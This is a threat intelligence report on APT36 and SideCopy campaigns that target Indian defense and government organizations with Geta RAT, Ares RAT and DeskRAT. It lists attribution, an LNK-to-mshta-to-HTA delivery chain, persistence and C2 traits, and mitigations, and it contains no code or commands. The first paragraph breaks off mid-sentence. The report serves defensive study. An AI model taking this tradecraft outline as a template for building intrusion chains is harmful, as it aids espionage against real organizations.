Full Report
Indian defense sector and government-aligned organizations have been targeted by multiple campaigns that are designed to compromise Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines. The campaigns are characterized by the use of malware families like Geta RAT, Ares RAT, and DeskRAT, which are often
Analysis Summary
# Threat Actor: APT36 and SideCopy
## Attribution & Identity
**Identified Actors:** APT36 and SideCopy.
**Known Aliases/Associations:** APT36 is also known as Transparent Tribe. SideCopy is assessed to operate as a subdivision of Transparent Tribe (APT36). These clusters are attributed to state-sponsored activity aligned with Pakistan.
## Activity Summary
The actors are conducting multiple, cross-platform campaigns targeting Indian entities. These campaigns aim to compromise Windows and Linux environments using Remote Access Trojans (RATs) to steal sensitive data and maintain long-term access. The operations are characterized by maintaining a low profile ("operating below the noise floor") while strategically focusing on specific sectors.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing emails containing malicious attachments or embedded download links.
- **Delivery Mechanisms:** Delivery of Windows shortcuts (LNK), ELF binaries, and PowerPoint Add-In files.
- **Windows Execution Chain:** Malicious LNK files invoking `mshta.exe` to execute an HTML Application (HTA) file hosted on compromised legitimate domains.
- **Payload Staging:** The HTA payload uses JavaScript to decrypt an embedded DLL payload, which writes a decoy PDF to disk before establishing C2 communication.
- **Defense Evasion:** Malware checks for installed security products and adapts persistence methods accordingly.
- **Persistence:** Establishing mechanisms for continued access post-compromise.
- **Command & Control:** Establishing hard-coded C2 communication.
- **Cross-Platform Capability:** Deploying equivalent malware families on both Windows and Linux.
- **Memory/Resident Techniques:** Leaning into memory-resident techniques.
## Targeting
- **Sectors:** Indian defense sector, government-aligned organizations, policy organizations, research institutions, critical infrastructure, and defense-adjacent organizations.
- **Geography:** India.
- **Victims:** Unspecified organizations within the Indian defense and government sectors.
## Tools & Infrastructure
- **Malware families used:**
- Geta RAT (Used primarily on Windows, capable of extensive system reconnaissance, data harvesting, and file operations).
- Ares RAT (Python-based, used on Linux environments).
- DeskRAT (Golang malware).
- **Infrastructure:** Attacker-controlled infrastructure, including compromised legitimate domains hosting HTA files and remote servers for fetching secondary payloads. C2 servers are hard-coded within the malware stages.
## Implications
The campaigns demonstrate a well-resourced, espionage-focused threat actor that is refining its tradecraft by expanding cross-platform coverage (Windows and Linux) and utilizing sophisticated, multi-stage delivery chains involving legitimate system tools (e.g., `mshta.exe`). The continuous strategic focus on the Indian defense and government ecosystem poses a significant espionage risk.
## Mitigations
- Enhance vigilance against phishing attempts utilizing defense or government-themed lures.
- Implement robust endpoint detection and response (EDR) solutions capable of monitoring obfuscated execution chains involving utilities like `mshta.exe`.
- Scrutinize the execution of common file types like LNK files and macros embedded in PowerPoint Add-Ins.
- Ensure security controls are effective across both Windows and Linux endpoints to counter cross-platform malware deployment.